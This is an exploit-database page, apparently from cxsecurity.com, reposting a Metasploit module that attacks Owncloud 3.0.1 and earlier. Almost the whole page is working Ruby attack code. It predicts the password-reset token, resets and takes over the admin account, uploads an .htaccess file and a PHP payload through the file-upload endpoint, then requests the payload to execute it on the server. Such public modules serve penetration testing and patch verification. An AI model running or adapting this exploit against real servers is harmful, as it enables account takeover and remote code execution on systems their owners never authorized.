Owncloud Account Overtake / File Upload Code Execution

2012.04.21
Credit: Lukas Kupczyk
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Owncloud Account Overtake, File Upload Code Execution', 'Description' => %q{ This module exploits several vulnerabilities in Owncloud 3.0.1 and earlier in order to achieve code execution. }, 'Author' => [ 'Lukas Kupczyk luks[at]sploit.de' ], 'License' => MSF_LICENSE, 'Version' => '', 'References' => [ ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, 'Space' => 8000 }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => '', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "Owncloud directory path", "/owncloud"]), OptString.new('USERNAME', [true, "The username to authenticate as", "admin"]), OptString.new('PASSWORD', [true, "New password", "metasploit"]), ], self.class) end def password_reset res = send_request_cgi({ 'uri' => "#{datastore['URI']}/core/lostpassword/index.php", 'method' => 'POST', 'data' => 'user=' + datastore['USERNAME'], }) if res.body =~ /Requested/ print_status("Triggered password reset") else raise RuntimeError, "Error: could not trigger password reset, does the user #{datastore['USERNAME']} exist?" end end def set_new_password(token) res = send_request_cgi({ 'uri' => "#{datastore['URI']}/core/lostpassword/resetpassword.php?user=#{datastore['USERNAME']}&token=#{token}", 'method' => 'POST', 'data' => "password=#{datastore['PASSWORD']}" }) if res.body =~ /Your password was reset/ print_status("New password set") else raise RuntimeError, "Error: Could not set new password" end end def gen_token require 'digest/sha1' uniqid = Time.now.to_i.to_s(16) Digest::SHA1.hexdigest((datastore['USERNAME'].to_i + uniqid.to_i).to_s) end def login res = send_request_cgi({ 'uri' => "#{datastore['URI']}/index.php", 'method' => 'POST', 'data' => "user=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}", }) if not res["Set-Cookie"] raise RuntimeError, "Error: Login failed" else print_status("Logged in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}") return res["Set-Cookie"] end end def upload(cookie, cmdscript) boundary = rand_text_alphanumeric(6) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n" data << ".htaccess\r\n--#{boundary}" data << "\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\".htaccess\"\r\n" data << "Content-Type: application/octet-stream\r\n\r\n" data << "allow from all" data << "\r\n--#{boundary}--" print_status("Uploading .htaccess") res = send_request_raw({ 'uri' => "#{datastore['URI']}/files/ajax/upload.php", 'method' => 'POST', 'data' => data, 'cookie' => cookie, 'headers' => { 'Content-Length' => data.length, 'Content-Type' => 'multipart/form-data; boundary=' + boundary, } }) if res.code != 200 print_error("Server returned non-200 status code (#{res.code})") end cmd_php = '<?php ' + payload.encoded + '?>' data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n" data << "#{cmdscript}.php\r\n--#{boundary}" data << "\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"#{cmdscript}.php\"\r\n" data << "Content-Type: application/octet-stream\r\n\r\n" data << cmd_php data << "\r\n--#{boundary}--" print_status("Uploading payload") res = send_request_raw({ 'uri' => "#{datastore['URI']}/files/ajax/upload.php", 'method' => 'POST', 'data' => data, 'cookie' => cookie, 'headers' => { 'Content-Length' => data.length, 'Content-Type' => 'multipart/form-data; boundary=' + boundary, } }) if res.code != 200 print_error("Server returned non-200 status code (#{res.code})") end end def exploit token = gen_token() print_status("Generated token: #{token}") password_reset() set_new_password(token) cookie = login() cmdscript = rand_text_alpha_lower(20) upload(cookie, cmdscript) # execute our payload res = send_request_raw({ 'uri' => "#{datastore['URI']}/data/#{datastore['USERNAME']}/files/#{cmdscript}.php", }) handler end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top